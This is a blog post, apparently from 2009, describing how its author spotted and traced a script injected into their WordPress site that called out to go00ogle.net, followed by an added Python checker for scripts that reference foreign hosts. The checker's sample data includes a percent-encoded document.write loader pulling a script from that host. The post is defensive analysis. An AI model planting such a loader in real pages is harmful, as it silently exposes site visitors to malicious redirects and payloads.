Has your web site ever been “infected”?
This happened to me today, for the first time in my life. Hello from go00ogle.net. Below are the technical details of what exactly happened, why I did not suffer any damage, and what I recommend doing to reduce your own susceptibility. The article is written for a non-technical reader.
How did I see that something was wrong?
While administering another blog of mine today, I noticed something in my web browser that I had not seen before: the icon of NoScript (a Firefox add-on) was showing that some scripts were blocked from execution. That is the small blue “S” with an even smaller red circle in the Firefox information bar, shown in the picture to the left.
NoScript stops the browser from executing scripts, which are parts of the web pages we browse. It is common practice nowadays to load scripts from hosts other than the one where the web page itself is hosted. NoScript blocks such calls by default and shows the red icon. Click it, and you see which hosts the web page has tried to call. I had whitelisted my own host shemyak.com, but I knew for sure that my blog should not call any scripts from a host such as go00ogle.net.
This is an indication that my host is doing something I did not ask it to.
How did I find out what it was?
The easiest thing nowadays is to type the question into a search engine. Google.com does not (at the moment of this writing) show anything helpful about go00ogle.com, except a couple of links to forums where the latter is called a scam site. But Google Safe Browsing itself identifies the almost-namesake as “suspicious”, and claims it “has hosted malicious software” as of 15.6.2009 (yesterday). Not much real information, at least yet.
Let’s look into the source ourselves. The source of my “problematic” page does not contain the string “go00ogle” anywhere. So the call to this site is made from some other script, called by this page.
Their locations can be found in the page source, but it’s even easier with the other security and privacy tool, AdBlock. Its window shows a list of all “items” on the page – images, styles, scripts and embedded objects. Cool, I see the script about which NoScript informed me, and also two other scripts which were always there.
Which of the two is the source of the problem? Thanks to AdBlock, I can just block them one by one and see whether NoScript still complains about blocking go00ogle.net. It turns out that the second one is “infected”; the first is not.
Let’s now explore “the bad” script. I copy its location and download it with wget:
$ wget -O infected-script 'http://www.konstantin.shemyak.com/dnevnik/wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4'
And open it with a text editor. The suspect is there! Here is the piece of code “calling home”, on line number 20:
The URL go00ogle.net is obfuscated (I do not see why the author of this script took the time to do it). The result of the execution is that the browser gets the following instruction:
And the default behavior of the browser would be to execute this script. Good that NoScript changes that.
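A small offline check that automates what the NoScript and AdBlock hunt above did by hand (an added example, not code from the post): fetch the page, pull every script it loads, undo percent-encoding and list any host a script references outside an allow list. The sample page and scripts are constructed, and the percent-encoded document.write is an assumed form of the obfuscation, not the one from this incident.

```python
import re
from urllib.parse import unquote, urljoin, urlparse

# Constructed sample resources standing in for live fetches (swap fetch()
# for wget or urllib in practice). The second script plays the part of the
# WordPress load-scripts.php bundle with an injected, percent-encoded loader
# for an external host; the encoding is assumed, not the incident's own.
PAGE_URL = "http://www.konstantin.shemyak.com/dnevnik/"
LOADER_URL = PAGE_URL + "wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags"
RESOURCES = {
    PAGE_URL: (
        '<html><head>'
        '<script src="/dnevnik/wp-includes/js/clean.js"></script>'
        '<script src="wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags"></script>'
        '</head><body>blog</body></html>'
    ),
    PAGE_URL + "wp-includes/js/clean.js": "function quicktag(){ return 1; }",
    LOADER_URL: (
        "/* jQuery, utils, quicktags ... */\n"
        "document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F"
        "go00ogle.net%2Fif.php%22%3E%3C%2Fscript%3E'));"
    ),
}

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
URL_IN_TEXT = re.compile(r'https?://[^\s"\'<>)]+', re.I)

def fetch(url):
    """Offline stand-in for wget: return the body of a known URL."""
    return RESOURCES[url]

def script_sources(html, base_url):
    """Absolute URLs of every external script the page loads."""
    return [urljoin(base_url, src) for src in SCRIPT_SRC.findall(html)]

def referenced_hosts(js):
    """Hosts named in URLs inside a script text, after undoing one layer
    of percent-encoding (loop unquote() if a script nests several)."""
    return {urlparse(u).hostname for u in URL_IN_TEXT.findall(unquote(js))}

def audit(page_url, allowed_hosts):
    """Map each loaded script URL to the hosts it references outside the allow list."""
    findings = {}
    for script_url in script_sources(fetch(page_url), page_url):
        foreign = referenced_hosts(fetch(script_url)) - set(allowed_hosts)
        if foreign:
            findings[script_url] = foreign
    return findings

if __name__ == "__main__":
    for url, hosts in audit(PAGE_URL, {"www.konstantin.shemyak.com"}).items():
        print(f"{url} calls out to: {', '.join(sorted(hosts))}")
```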
What could have happened if I had not used the preventive measures?
Let’s see what is inside that go00ogle.net/if.php:
So it’s a redirect to another script. It may also roll up a counter for “surinamefoto.com”. Unwrapping what comes from trafing.net, I saw two other redirects, again with possible roll-ups of counters. I lost interest in hunting it down further and a) submitted a support ticket to my hosting provider, b) informed the WordPress community about the issue (I was not the first victim there).
It’s that simple. Just use tools like AdBlock and NoScript. The first is a “blacklist”-type filter (specifically prohibiting items which you know you do not want – it works great for advertising banners and counters you do not need); the second is a “whitelist” (prohibiting by default everything except items you have explicitly allowed). By default, your browser may execute any code – even code coming from places you never asked for. This is probably not a good idea, so do not use a web browser in which you cannot easily disable this insecure behavior.